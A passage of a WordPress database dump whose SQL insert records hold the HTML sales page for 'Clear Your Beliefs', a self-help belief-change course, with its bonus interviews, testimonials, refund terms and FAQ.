bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 18:28:28', '2014-06-17 23:28:28', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(953, 2, '2014-06-17 18:29:40', '2014-06-17 23:29:40', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nLearn to change your beliefs, and your\r\npossibilities will be unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> 